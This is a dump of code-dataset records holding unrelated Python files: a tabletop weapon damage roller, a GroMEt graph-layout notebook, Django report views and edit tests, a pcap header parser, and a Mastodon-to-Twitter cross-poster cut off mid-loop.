pass","sub_path":"apps/performance/api/Query/JobWorking.py","file_name":"JobWorking.py","file_ext":"py","file_size_in_byte":9618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"331078814","text":"from random import choice\nfrom Dice_Rolling import d4, d6, d8, d10, d12\n\nmelee = 0\nranged = 1\n\nslashing = 0\npiercing = 1\nbludgeoning = 2\n\nfinesse = 0\nheavy = 1\nlight = 2\nloading = 3\nreach = 4\nthrown = 5\ntwo_handed = 6\nversatile = 7\n\n\nclass Weapon:\n def __init__(self, die, num_dice, d_type, m_range, properties):\n self.damage = d_type\n self.range = m_range\n self.properties = properties\n self.die = die\n self.num_dice = num_dice\n\n def attack(self, abilities: list, reroll=False, twohand=False):\n mod = self.primary_mod(abilities)\n damage = mod\n damage_die = self.die\n if twohand and versatile in self.properties:\n if damage_die == d4:\n damage_die = d6\n elif damage_die == d6:\n damage_die = d8\n elif damage_die == d8:\n damage_die = d10\n elif damage_die == d10:\n damage_die = d12\n for _ in range(self.num_dice):\n roll = choice(damage_die)\n if not reroll:\n damage += roll\n elif roll > 2:\n damage += roll\n else:\n damage += choice(damage_die)\n return damage\n\n def primary_mod(self, abilities: list):\n mod = abilities[0]\n if self.range == melee and (finesse in self.properties and abilities[1] > abilities[0]):\n mod = abilities[1]\n return (mod - 10) // 2\n\n\nwarhammer = Weapon(d8, 1, bludgeoning, melee, [versatile])\nlongsword = Weapon(d8, 1, slashing, 
melee, [versatile])\nbattleaxe = Weapon(d8, 1, slashing, melee, [versatile])\nmaul = Weapon(d6, 2, bludgeoning, melee, [two_handed, heavy])\ngreatsword = Weapon(d6, 2, slashing, melee, [two_handed, heavy])\ngreataxe = Weapon(d12, 1, slashing, melee, [two_handed, heavy])\nflail = Weapon(d8, 1, bludgeoning, melee, [])\nshortsword = Weapon(d6, 1, piercing, melee, [finesse, light])\nspear = Weapon(d6, 1, piercing, melee, [thrown, versatile])\n","sub_path":"Weapons.py","file_name":"Weapons.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"153376692","text":"# %%[markdown]\n# Author: Nelson Liu \n#\n# Email: [nliu@uncharted.software](mailto:nliu@uncharted.software)\n\n# %%[markdown]\n# Content:\n# * Parse directly the \"loop\" and CHIME GroMEt examples from UAZ/Clay\n# * \n\n# %%\nimport os\nimport json\nimport networkx as nx\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom typing import Dict, Tuple, Any, Optional\n\n# %%[markdown]\n# # Run the Dario parser over the GroMEt\n\ndeno_command = 'deno run --allow-write --allow-read'\nparser_path = '/home/nliu/projects/aske/research/gromet/tools/parse.ts'\ndata_dir = '/home/nliu/projects/aske/research/gromet/data/uaz/'\ndist_dir = '/home/nliu/projects/aske/research/gromet/dist/uaz/'\n\ngromet = []\ngraph = []\nfor p in ('loop/loop_ex2_gromet_FunctionNetwork_correction', 'conditional/cond_ex1_gromet_FunctionNetwork', 'CHIME/CHIME_SIR_v01_gromet_FunctionNetwork_by_hand'):\n\n gromet_path = data_dir + f'{p}.json'\n graph_path = dist_dir + f'{p}_graph.json'\n\n __ = os.system(deno_command + ' ' + parser_path + ' ' + gromet_path + ' ' + graph_path)\n\n with open(gromet_path, 'r') as f:\n gromet.append(json.load(f))\n\n with open(graph_path, 'r') as f:\n graph.append(json.load(f))\n\n\ndeno_command = parser_path = data_dir = dist_dir = gromet_path = f = p = None\ndel deno_command, parser_path, data_dir, dist_dir, gromet_path, f, p\n\n# %%\n\n\n# \"W:loop_ex2.loop_1.e\"\n# \"W:loop_1.loop_1_cond.e\"\n# \"wires\": [\n# \"W:loop_ex2.loop_1.e\",\n# \"W:loop_ex2.loop_1.k\",\n# \"W:loop_1.loop_ex2.k\"\n# ],\n\n\n# gromet_loop['wires'][0]['tgt'] = 'P:loop_1.in.e'\n# gromet_loop['wires'][1]['src'] = 'P:loop_1.in.e'\n\n# %%\n# Calculate hierarchy level of a node from its ID (e.g. 
\"0::12:11\" = 0 -> 12 -> 11)\ndef calculate_node_level(node_id: str) -> int:\n\n node_level = len(node_id.split('::')) - 1\n\n return node_level\n\n# Get children of all nodes in graph\ndef get_node_children(graph: Dict) -> Dict:\n\n node_children = {node['id']: [] for node in graph['nodes']}\n for node in graph['nodes']:\n if node['parent'] != None:\n node_children[node['parent']].append(node['id'])\n\n return node_children\n\n# Get children of all nodes in NX graph object\ndef get_node_children_nx(G: Dict) -> Dict:\n\n node_children = {node['id']: [] for node in G.nodes}\n for node in G.nodes:\n if G.nodes[node]['parent'] != None:\n node_children[G.nodes[node]['parent']].append(node)\n\n return node_children\n\n# Get all descendants of every node in NX graph object\ndef get_node_descendants_nx(G: Dict) -> Dict:\n\n node_descendants = {node: [] for node in G.nodes}\n for node in G.nodes:\n k = node.split('::')[:-1]\n for i in range(1, len(k) + 1):\n node_parent = '::'.join(k[0:i])\n if node_parent in node_descendants.keys():\n node_descendants[node_parent].append(node)\n\n return node_descendants\n\n# Generate NX Object from a parsed GroMEt\ndef generate_nx_obj(graph: Dict) -> Any:\n\n # Missing graph metadata (lost during Dario parsing)\n G = nx.MultiDiGraph(\n uid = None, \n type = None, \n name = None,\n metadata = graph['metadata']\n )\n\n # Add nodes\n G.add_nodes_from([(node['id'], {**node}) for node in graph['nodes']])\n\n # Add edges\n G.add_edges_from([(edge['source'], edge['target'], {'weight': 1}) for edge in graph['edges']])\n\n return G\n\n# Add equi-level edges\n# If an edge exists between a level-k node and a level-(k + 1) one, \n# add an edge between the level-k node and the level-k parent of the other\ndef add_missing_edges(G: Any) -> Any:\n\n edges = []\n for edge in G.edges:\n\n m = calculate_node_level(edge[0])\n n = calculate_node_level(edge[1])\n \n if m != n:\n \n i = np.argmin([m, n])\n if i == 0:\n src = G.nodes[edge[0]]['id']\n tgt = G.nodes[edge[1]]['parent']\n else:\n src = G.nodes[edge[0]]['parent']\n tgt = G.nodes[edge[1]]['id']\n\n if src != tgt:\n edges.append((src, tgt, 0))\n\n\n G.add_edges_from(edges, weight = 0)\n\n return None\n\n# Promote edges between nodes of different parent nodes to edges between the parent nodes\n# e.g. 
\"0::1::2\"->\"0::2::3\" becomes \"0::1\"->\"0::2\"\n# \"0::3\"->\"0:28:27\" becomes \"0::3\"->\"0:28\"\ndef promote_edges(G: Any) -> Any:\n\n edges_remove = []\n edges_add = []\n\n for edge in G.edges:\n src_parent = G.nodes[edge[0]]['parent']\n tgt_parent = G.nodes[edge[1]]['parent']\n\n if src_parent != tgt_parent:\n\n m = calculate_node_level(edge[0])\n n = calculate_node_level(edge[1])\n \n if m != n:\n k = min([m, n]) + 1\n src = '::'.join(edge[0].split('::')[:k])\n tgt = '::'.join(edge[1].split('::')[:k])\n edges_add.append((src, tgt))\n\n else:\n edges_add.append((src_parent, tgt_parent))\n\n edges_remove.append(edge)\n\n\n G.remove_edges_from(edges_remove)\n G.add_edges_from(edges_add, weight = -1)\n\n return None\n\n# Generate linear layout from a NetworkX graph using condensation & topological sorting\ndef generate_linear_layout(G: Any, offset: Optional[Dict] = None, draw: Optional[bool] = False, ax: Optional[Any] = None) -> Any:\n\n # Condense graph to a DAG and topologically sort it\n G_cond = nx.condensation(G)\n S = nx.topological_sort(G_cond)\n\n # Generate x-coordinates by offset or at least 1\n k = 0\n pos = {}\n for i in S:\n for node_id in G_cond.nodes[i]['members']:\n pos[node_id] = np.array([k, 0])\n\n if offset != None:\n k += max([offset[node_id], 1])\n else:\n k += 1\n if draw == True:\n\n if ax == None:\n fig, ax = plt.subplots(nrows = 1, ncols = 1, figsize = (20, 5))\n\n __ = draw_graph(G, pos = pos, ax = ax, G_full = G)\n\n return pos\n\n# Draw NX Object\ndef draw_graph(G: Any, pos: Dict, ax: Optional[Any] = None, node_args: Optional[Dict] = None, edge_args: Optional[Dict] = None, label_args: Optional[Dict] = None, legend_args: Optional[Dict] = None, G_full: Optional[Any] = None, label_key: Optional[str] = 'label') -> Any:\n\n if ax == None:\n fig, ax = plt.subplots(nrows = 1, ncols = 1, figsize = (20, 5))\n\n if node_args == None:\n\n if G_full == None:\n node_types = {t: i for i, t in enumerate(np.unique([G.nodes[node]['nodeType'] for node in G.nodes]))}\n else:\n node_types = {t: i for i, t in enumerate(np.unique([G_full.nodes[node]['nodeType'] for node in G_full.nodes]))}\n \n node_args = {\n # 'node_size': [len(get_node_children_nx(G, node_id = node)) for node in G.nodes],\n 'node_size': [100 for node in G.nodes],\n 'node_color': [node_types[G.nodes[node]['nodeType']] for node in G.nodes],\n 'cmap': 'tab10',\n 'vmin': 0,\n 'vmax': 9,\n }\n node_norm = mpl.colors.Normalize(vmin = 0, vmax = 9)\n node_cmap = mpl.cm.get_cmap(node_args['cmap'])\n\n if edge_args == None:\n edge_args = {\n 'edge_color': 'tab:gray',\n 'alpha': 0.5,\n 'connectionstyle': 'arc3,rad=0.15',\n }\n\n if label_args == None:\n label_args = {\n 'font_color': 'black',\n 'font_size': 10,\n 'horizontalalignment': 'left', \n 'verticalalignment': 'bottom',\n 'labels': {node: G.nodes[node][label_key] for node in G.nodes},\n }\n\n if legend_args == None:\n\n if len(node_args) > 0:\n\n legend_elements = [\n mpl.lines.Line2D(\n [0], [0], marker = 'o', color = 'w', label = t, markersize = 20,\n markerfacecolor = node_cmap(node_norm(val))\n ) for t, val in node_types.items()\n ]\n\n legend_args = {\n 'loc': 'lower right',\n 'ncol': len(legend_elements)\n }\n\n if len(node_args) > 0:\n h_nodes = nx.draw_networkx_nodes(G, pos = pos, ax = ax, **node_args)\n\n if len(edge_args) > 0:\n h_edges = nx.draw_networkx_edges(G, pos = pos, ax = ax, **edge_args)\n\n if len(label_args) > 0:\n h_labels = nx.draw_networkx_labels(G, pos = pos, ax = ax, **label_args)\n __ = [t.set_rotation(15) for __, t in 
h_labels.items()]\n\n __ = plt.setp(ax, ylim = (-3, 3))\n\n if len(legend_args) > 0:\n # ax.legend(handles = legend_elements, loc = 'lower right', ncol = len(legend_elements))\n ax.legend(handles = legend_elements, **legend_args)\n\n\n return None\n\n# Generate linear layout that is layered by the parent-child hierarchy of the graph\ndef generate_linear_layout_with_hierarchy(G: Any, draw: Optional[bool] = False, ax: Optional[Any] = None) -> Dict:\n\n if (draw == True) & (ax == None):\n fig, ax = plt.subplots(nrows = 1, ncols = 1, figsize = (20, 5))\n\n pos_full = {None: np.array([0, -1])}\n max_node_level = max([calculate_node_level(node) for node in G.nodes])\n\n node_descendants = get_node_descendants_nx(G)\n num_descendants = {node: len(l) for node, l in node_descendants.items()}\n\n\n for l in range(max_node_level + 1):\n\n nodes = [node for node in G.nodes if calculate_node_level(node) == l]\n parents = set([G.nodes[node]['parent'] for node in nodes])\n\n for parent in parents:\n\n nodes_ = [node for node in G.nodes if G.nodes[node]['parent'] == parent]\n G_sub = G.subgraph(nodes_)\n pos = generate_linear_layout(G = G_sub, offset = num_descendants)\n pos = {k: v + pos_full[parent] + np.array([0, 1]) for k, v in pos.items()}\n pos_full = {**pos_full, **pos}\n\n if draw == True:\n __ = draw_graph(G_sub, pos = pos, ax = ax, G_full = G)\n\n if draw == True:\n __ = plt.setp(ax, ylim = (-1, max_node_level + 1))\n \n return pos_full\n\n\n# %%\n\nG = generate_nx_obj(graph = graph[0])\n\nG.remove_edge('0::6::14', '0::6::5')\nG.remove_edge('0::6::15', '0::6::13')\nG.remove_edge('0::6::10', '0::6::8')\n\n__ = add_missing_edges(G = G)\n__ = promote_edges(G = G)\n# __ = generate_linear_layout(G, draw = True)\n\n__ = generate_linear_layout_with_hierarchy(G, draw = True)\n\n# %%\n\nG = generate_nx_obj(graph = graph[1])\n\n__ = add_missing_edges(G = G)\n__ = promote_edges(G = G)\n# __ = generate_linear_layout(G, draw = True)\n\n__ = generate_linear_layout_with_hierarchy(G, draw = True)\n\n\n# %%\nG = generate_nx_obj(graph = graph[2])\n\n__ = add_missing_edges(G = G)\n__ = promote_edges(G = G)\n# __ = generate_linear_layout(G, draw = True)\n\n__ = generate_linear_layout_with_hierarchy(G, draw = True)\n\n\n# %%\n","sub_path":"gromet/notebooks/8_uaz_gromet_testing.py","file_name":"8_uaz_gromet_testing.py","file_ext":"py","file_size_in_byte":10745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"94588924","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.forms import inlineformset_factory\nfrom django.contrib.auth.forms import UserCreationForm\n\nfrom django.contrib.auth.models import Group\nfrom django.urls import reverse\n\nfrom datetime import timedelta, date, time\nfrom django.conf import settings\nfrom django.http import HttpResponse\nfrom django.template.loader import get_template\nfrom xhtml2pdf import pisa\nfrom django.contrib.staticfiles import finders\nimport csv\n#from .doctest import report\n# Create your views here.\nfrom .models import *\nfrom .forms import *\n#from .filters import InspectionFilter\n\n\n\n# Create your views here.\ndef home(request):\n\n\toperation = Operation.objects.all()\n\tinspection = Inspection.objects.all()\n\n\n\tcontext = {'operation':operation, 'inspection':inspection}\n\n\treturn render(request, 'report/home.html', context)\n\n\ndef prework(request):\n\n\treturn render(request, 'report/prework.html')\n\n\ndef 
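# A stand-alone sketch of the condensation-plus-topological-sort idea that
# generate_linear_layout() in the record above is built on: collapse every
# strongly connected component to one node, sort the resulting DAG, and hand
# out x-coordinates in that order. Toy node names, not real GroMEt ids.
import networkx as nx
import numpy as np

G_demo = nx.MultiDiGraph()
G_demo.add_edges_from([('a', 'b'), ('b', 'c'), ('c', 'b'), ('c', 'd')])  # b <-> c form a cycle

G_cond = nx.condensation(G_demo)            # one node per strongly connected component
k = 0
pos = {}
for scc in nx.topological_sort(G_cond):
    for node_id in G_cond.nodes[scc]['members']:
        pos[node_id] = np.array([k, 0])     # place nodes along the x-axis in sorted order
        k += 1
print(pos)                                  # 'a' first, the b/c cycle together, 'd' last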
inspectionDetail(request, pk):\n\tblade = Blade.objects.get(id=pk)\n\n\tinspection = blade.inspection_set.all()\n\n\t#report(operation, inspection)\n\n\tcontext = {'blade':blade, 'inspection':inspection}\n\treturn render(request, 'report/inspection_detail.html', context)\n\ndef bladeDetail(request, pk):\n\toperation = Operation.objects.get(id=pk)\n\n\tblades = operation.blade_set.all()\n\n\t#report(operation, inspection)\n\n\tcontext = {'operation':operation, 'blades':blades}\n\treturn render(request, 'report/blade_detail.html', context)\n\ndef createOperation(request):\n\tform = OperationForm()\n\n\tif request.method == 'POST':\n\t\tform = OperationForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('/')\n\n\tcontext = {'form':form}\n\treturn render(request, 'report/operation_form.html', context)\n\ndef createBlade(request, pk):\n\tBladeFormset = inlineformset_factory(Operation, Blade, fields='__all__', extra=3)\n\toperation = Operation.objects.get(id=pk)\n\tformset = BladeFormset(queryset=Blade.objects.none(), instance=operation)\n\n\tif request.method == 'POST':\n\t\tformset = BladeFormset(request.POST, instance=operation)\n\t\tif formset.is_valid():\n\t\t\tformset.save()\n\t\t\treturn redirect('/')\n\n\tcontext = {'form':formset}\n\treturn render(request, 'report/blade_form.html', context)\n\n\ndef createInspection(request, pk):\n\tInspectionFormSet = inlineformset_factory(Blade, Inspection, fields='__all__', extra=3)\n\tblade = Blade.objects.get(id=pk)\n\tformset = InspectionFormSet(queryset=Inspection.objects.none(), instance=blade)\n\n\tif request.method == 'POST':\n\t\tformset = InspectionFormSet(request.POST, instance=blade)\n\t\tif formset.is_valid():\n\t\t\tformset.save()\n\t\t\treturn redirect('/')\n\n\tcontext = {'form':formset}\n\treturn render(request, 'report/inspection_form.html', context)\n\n\ndef updateOperation(request, pk):\n\toperation = Operation.objects.get(id=pk)\n\tform = OperationForm(instance=operation)\n\n\tif request.method == 'POST':\n\t\tform = OperationForm(request.POST, instance=operation)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('/')\n\n\tcontext = {'form':form}\n\treturn render(request, 'report/operation_form.html', context)\n\ndef updateBlade(request, pk):\n\tblade = Blade.objects.get(id=pk)\n\tform = BladeForm(instance=blade)\n\n\tif request.method == 'POST':\n\t\tform = BladeForm(request.POST, instance=blade)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('/')\n\n\tcontext = {'form':form}\n\treturn render(request, 'report/blade_update_form.html', context)\n\ndef updateInspection(request, pk):\n\tinspection = Inspection.objects.get(id=pk)\n\tform = InspectionForm(instance=inspection)\n\n\tif request.method == 'POST':\n\t\tform = InspectionForm(request.POST, instance=inspection)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('/')\n\n\tcontext = {'form':form}\n\treturn render(request, 'report/inspection_update_form.html', context)\n\ndef deleteOperation(request, pk):\n\toperation = Operation.objects.get(id=pk)\n\tif request.method == \"POST\":\n\t\toperation.delete()\n\t\treturn redirect('/')\n\n\tcontext = {'item':operation}\n\treturn render(request, 'report/delete_operation.html', context)\n\ndef deleteBlade(request, pk):\n\tblade = 
Blade.objects.get(id=pk)\n\tif request.method == \"POST\":\n\t\tblade.delete()\n\t\treturn redirect('/')\n\n\tcontext = {'item':blade}\n\treturn render(request, 'report/delete_blade.html', context)\n\ndef deleteInspection(request, pk):\n\tinspection = Inspection.objects.get(id=pk)\n\tbladeid = inspection.blade\n\tprint(bladeid)\n\tif request.method == \"POST\":\n\t\tinspection.delete()\n\t\treturn redirect('/')\n\n\tcontext = {'item':inspection}\n\treturn render(request, 'report/delete_inspection.html', context)","sub_path":"report/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"16838036","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport io\n\nfrom ctypes import *\nfrom argparse import ArgumentParser\n\nclass PcapHeader(LittleEndianStructure):\n __hdr_len__ = 24\n _fields_ = (\n ('magic_num', c_uint32), # magic number\n ('major_ver', c_uint16), # major version\n ('minor_ver', c_uint16), # minor version\n ('timezone_offset', c_int32), \n ('timestamp_accuracy', c_uint32), \n ('snap_len', c_uint32), # snapshot_length : max size of each packet capture data\n ('link_type', c_uint32) # link-layer header type\n )\n\nclass PacketHeader(LittleEndianStructure):\n __hdr_len__ = 16\n _fields_ = (\n ('timestamp_sec', c_uint32),\n ('timestamp_usec', c_uint32),\n ('cap_len', c_uint32),\n ('pkt_len', c_uint32),\n )\n \n def __len__(self):\n return self.__hdr_len__\n\n\ndef show_pcap_header(pcap_header):\n print(f'magic number : {hex(pcap_header.magic_num)}')\n print(f'major version : {pcap_header.major_ver}')\n print(f'minor version : {pcap_header.minor_ver}')\n print(f'timezone offset : {pcap_header.timezone_offset}')\n print(f'timestamp_accuracy : {pcap_header.timestamp_accuracy}')\n print(f'snapshot length : {pcap_header.snap_len}')\n print(f'link-layer header type : {pcap_header.link_type}')\n\ndef show_packet_header(packet_header):\n print(f'timestamp_sec : {packet_header.timestamp_sec}')\n print(f'timestamp_usec : {packet_header.timestamp_usec}')\n print(f'capture length : {packet_header.cap_len}')\n print(f'packet length : {packet_header.pkt_len}')\n\ndef debug():\n import string\n\n file_name = 'kbd.pcap'\n # file_name = 'test.pcap'\n\n # buffer = io.BytesIO(string.ascii_lowercase.encode('utf-8')[:24])\n buffer = open(file_name, 'rb')\n ph = PcapHeader()\n pkth = PacketHeader()\n buffer.readinto(ph)\n show_pcap_header(ph)\n for _ in range(10):\n buffer.readinto(pkth)\n print('----------------------------')\n print('----------------------------')\n show_packet_header(pkth)\n print('----------------------------')\n print(buffer.read(24))\n\nif __name__ == '__main__':\n # Check debug flag\n parser = ArgumentParser()\n parser.add_argument(\"--debug\", action=\"store_true\")\n args = parser.parse_args()\n \n is_debug = args.debug\n\n if is_debug:\n debug()","sub_path":"pcap/pcap.py","file_name":"pcap.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"497478209","text":"from django.test import TestCase\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\nfrom unittest_data_provider import data_provider\n\nfrom ..models import Person\n\n\nclass NonAuthEditTestCase(TestCase):\n def test_edit_page_redirect(self):\n response = self.client.get(reverse('edit-view'))\n self.assertEqual(response.status_code, 302)\n\n def 
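# pcap.py above reads binary headers by declaring ctypes structures and
# filling them directly from the stream with readinto(). The same pattern in
# miniature, against an in-memory buffer instead of a real capture file:
import io
from ctypes import LittleEndianStructure, c_uint16, c_uint32

class MiniHeader(LittleEndianStructure):
    _fields_ = (('magic', c_uint32), ('major', c_uint16), ('minor', c_uint16))

raw = (0xA1B2C3D4).to_bytes(4, 'little') + (2).to_bytes(2, 'little') + (4).to_bytes(2, 'little')
hdr = MiniHeader()
io.BytesIO(raw).readinto(hdr)   # copies the little-endian bytes straight into the struct
print(hex(hdr.magic), hdr.major, hdr.minor)  # 0xa1b2c3d4 2 4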
test_edit_page_redirects_to_home_page(self):\n response = self.client.get(reverse('edit-view'), follow=True)\n last_redirect = response.redirect_chain[-1][0]\n self.assertIn(\"/accounts/login/?next=/edit/\", last_redirect)\n self.assertEqual(response.status_code, 200)\n self.assertIn('Log in here', response.content)\n\n\nclass AuthEditTestCase(TestCase):\n def setUp(self):\n self.person = Person.objects.get(pk=1)\n self.user = User.objects.create_user('Jane', 'jane.doe@gmail.com',\n 'test')\n self.client.login(username='Jane', password='test')\n self.response = self.client.get(reverse('edit-view'))\n\n page_elements = lambda: (\n ('Edit contact details', response.content)\n self.assertIn('\"message\": \"An error occurred while updating data\"', response.content)\n else:\n self.assertIn('Edit contact details', response.content)\n self.assertNotIn('\"message\": \"An error occurred while updating data\"', response.content)\n\n @data_provider(ajax_requests)\n def test_form_submit_with_data(self, ajax_request):\n new_name = \"Martishka\"\n self.proper_data['first_name'] = new_name\n self.proper_data['is_ajax_request'] = ajax_request\n self.client.post(reverse('edit-view'), self.proper_data)\n person = Person.objects.get(pk=1)\n self.assertEqual(person.first_name, new_name)\n\n @data_provider(ajax_requests)\n def test_form_submit_redirect(self, ajax_request):\n self.proper_data['is_ajax_request'] = ajax_request\n\n response = self.client.post(reverse('edit-view'), self.proper_data,\n follow=True)\n self.assertEqual(response.status_code, 200)\n if ajax_request:\n self.assertNotIn('Contact Details', response.content)\n self.assertIn('\"message\": \"Data was successfully updated\"', response.content)\n else:\n self.assertIn('Contact Details', response.content)\n self.assertNotIn('\"message\": \"Data was successfully updated\"', response.content)\n","sub_path":"django_hello_world/hello/tests/EditTestCase.py","file_name":"EditTestCase.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"333395241","text":"# coding: utf-8\n\n\"\"\"\nMastodon -> Twitter cross-poster\n\"\"\"\n\nimport time\nimport re\nimport requests\nimport html\nimport tempfile\nimport os\nimport mimetypes\nimport sys\nfrom builtins import input\n\nfrom mastodon import Mastodon\nimport twitter\n\n# How long to wait between polls to the API, in seconds\nMASTODON_POLL_DELAY = 30\n\n# The Mastodon instance base URL. 
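# The test case above drives one test method with several inputs via
# unittest_data_provider: the provider is a callable returning a sequence of
# argument tuples, and the decorated test runs once per tuple. A minimal
# sketch of that pattern:
from unittest import TestCase
from unittest_data_provider import data_provider

ajax_flags = lambda: ((True,), (False,))

class DataProviderSketch(TestCase):
    @data_provider(ajax_flags)
    def test_runs_per_tuple(self, is_ajax_request):
        self.assertIn(is_ajax_request, (True, False))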
By default, https://mastodon.social/\nMASTODON_BASE_URL = \"https://mastodon.social\"\n\n# Some helpers copied out from python-twitter, because they're broken there\nURL_REGEXP = re.compile((\n r'('\n r'(?!(https?://|www\\.)?\\.|ftps?://|([0-9]+\\.){{1,3}}\\d+)' # exclude urls that start with \".\"\n r'(?:https?://|www\\.)*(?!.*@)(?:[\\w+-_]+[.])' # beginning of url\n r'(?:{0}\\b|' # all tlds\n r'(?:[:0-9]))' # port numbers & close off TLDs\n r'(?:[\\w+\\/]?[a-z0-9!\\*\\'\\(\\);:&=\\+\\$/%#\\[\\]\\-_\\.,~?])*' # path/query params\nr')').format(r'\\b|'.join(twitter.twitter_utils.TLDS)), re.U | re.I | re.X)\n\ndef calc_expected_status_length(status, short_url_length=23):\n replaced_chars = 0\n status_length = len(status)\n match = re.findall(URL_REGEXP, status)\n if len(match) >= 1:\n replaced_chars = len(''.join(map(lambda x: x[0], match)))\n status_length = status_length - replaced_chars + (short_url_length * len(match))\n return status_length\n\n# Boot-strap app and user information\nif not os.path.isfile(\"mtt_twitter.secret\"):\n print(\"This appears to be your first time running MastodonToTwitter.\")\n print(\"After some configuration, you'll be up and running in no time.\")\n print(\"First of all, to talk to twitter, you'll need a twitter API key.\")\n print(\"\\n\")\n print(\"Usually, the application creator is supposed to make that, but with\")\n print(\"an application that isn't a hosted service or a binary blob, with\")\n print(\"the key in plain text, this is not easily possible.\")\n print(\"\\n\")\n print(\"You'll need to register an app on https://apps.twitter.com/ .\")\n print(\"You may have to add a phone number to your twitter account to be able\")\n print(\"to do this.\")\n print(\"\\n\")\n print(\"Once you are done (make sure to allow your app write permissions),\")\n print(\"go to your apps 'Keys and Tokens' page and enter the info from there\")\n print(\"here.\")\n print(\"\\n\")\n\n twitter_works = False\n while not twitter_works:\n TWITTER_CONSUMER_KEY = input(\"Twitter Consumer Key (API Key): \").strip()\n TWITTER_CONSUMER_SECRET = input(\"Twitter Consumer Secret (API Secret): \").strip()\n TWITTER_ACCESS_KEY = input(\"Twitter Access Token: \").strip()\n TWITTER_ACCESS_SECRET = input(\"Twitter Access Token Secret: \").strip()\n \n print(\"\\n\")\n print(\"Alright, trying to connect to twitter with those credentials...\")\n print(\"\\n\")\n \n try:\n twitter_works = True \n twitter_api = twitter.Api(\n consumer_key = TWITTER_CONSUMER_KEY,\n consumer_secret = TWITTER_CONSUMER_SECRET,\n access_token_key = TWITTER_ACCESS_KEY,\n access_token_secret = TWITTER_ACCESS_SECRET\n )\n twitter_api.VerifyCredentials() \n except:\n twitter_works = False\n \n if twitter_works == False:\n print(\"Hmm, that didn't work. Check if you copied everything correctly\")\n print(\"and make sure you are connected to the internet.\")\n print(\"\\n\")\n\n print(\"Great! Twitter access works! 
With mastodon, the situation is a bit easier,\")\n    print(\"all you'll have to do is enter your username (that you log in to mastodon\")\n    print(\"with, this is usually your e-mail) and password.\")\n    print(\"\\n\")\n\n    mastodon_works = False\n    while mastodon_works == False:\n        MASTODON_USERNAME = input(\"Mastodon Username (e-mail): \").strip()\n        MASTODON_PASSWORD = input(\"Mastodon Password: \").strip()\n\n        print(\"\\n\")\n        if os.path.isfile(\"mtt_mastodon_client.secret\"):\n            print(\"You already have an app set up, so we're skipping that step.\")\n        else:\n            print(\"App creation should be automatic...\")\n            try:\n                Mastodon.create_app(\n                    \"MastodonToTwitter\",\n                    to_file = \"mtt_mastodon_client.secret\",\n                    scopes = [\"read\"],\n                    api_base_url = MASTODON_BASE_URL\n                )\n            except:\n                print(\"... but it failed. That shouldn't really happen. Please retry\")\n                print(\"from the start, and if it keeps not working, submit a bug report at\")\n                print(\"http://github.com/halcy/MastodonToTwitter .\")\n                sys.exit(0)\n            print(\"...done! Next up, let's verify your login data.\")\n            print(\"\\n\")\n\n        try:\n            mastodon_works = True\n            mastodon_api = Mastodon(\n                client_id = \"mtt_mastodon_client.secret\",\n                api_base_url = MASTODON_BASE_URL\n            )\n            mastodon_api.log_in(\n                username = MASTODON_USERNAME,\n                password = MASTODON_PASSWORD,\n                to_file = \"mtt_mastodon_user.secret\",\n                scopes = [\"read\"]\n            )\n        except:\n            mastodon_works = False\n\n        if mastodon_works == False:\n            print(\"Logging in didn't work. Check if you typed something wrong\")\n            print(\"and make sure you are connected to the internet.\")\n            print(\"\\n\")\n\n    print(\"Alright, then, looks like you're all set!\")\n    print(\"\\n\")\n    print(\"Your credentials have been saved to three files ending in .secret in the\")\n    print(\"current directory. While none of the files contain any of your passwords,\")\n    print(\"the keys inside will allow people to access your Twitter and Mastodon\")\n    print(\"accounts, so make sure other people cannot access them!\")\n    print(\"\\n\")\n    print(\"The cross-poster will now start, and should post all your mastodon posts\")\n    print(\"from this moment on to twitter while it is running! For future runs, you\")\n    print(\"won't see any of these messages. To start over, simply delete all the .secret\")\n    print(\"files. 
Have fun tooting!\")\n print(\"\\n\")\n \n with open(\"mtt_twitter.secret\", 'w') as secret_file:\n secret_file.write(TWITTER_CONSUMER_KEY + '\\n')\n secret_file.write(TWITTER_CONSUMER_SECRET + '\\n')\n secret_file.write(TWITTER_ACCESS_KEY + '\\n')\n secret_file.write(TWITTER_ACCESS_SECRET + '\\n')\n\n# Read in twitter credentials\nwith open(\"mtt_twitter.secret\", 'r') as secret_file:\n TWITTER_CONSUMER_KEY = secret_file.readline().rstrip()\n TWITTER_CONSUMER_SECRET = secret_file.readline().rstrip()\n TWITTER_ACCESS_KEY = secret_file.readline().rstrip()\n TWITTER_ACCESS_SECRET = secret_file.readline().rstrip()\n\t\n# Log in and start up\nmastodon_api = Mastodon(\n client_id = \"mtt_mastodon_client.secret\", \n access_token = \"mtt_mastodon_user.secret\", \n ratelimit_method=\"wait\",\n api_base_url = MASTODON_BASE_URL\n)\ntwitter_api = twitter.Api(\n consumer_key = TWITTER_CONSUMER_KEY,\n consumer_secret = TWITTER_CONSUMER_SECRET,\n access_token_key = TWITTER_ACCESS_KEY,\n access_token_secret = TWITTER_ACCESS_SECRET\n)\n\nmy_acct_id = mastodon_api.account_verify_credentials()[\"id\"]\nsince_toot_id = mastodon_api.account_statuses(my_acct_id)[0][\"id\"]\n\nwhile True:\n # Fetch new toots\n new_toots = 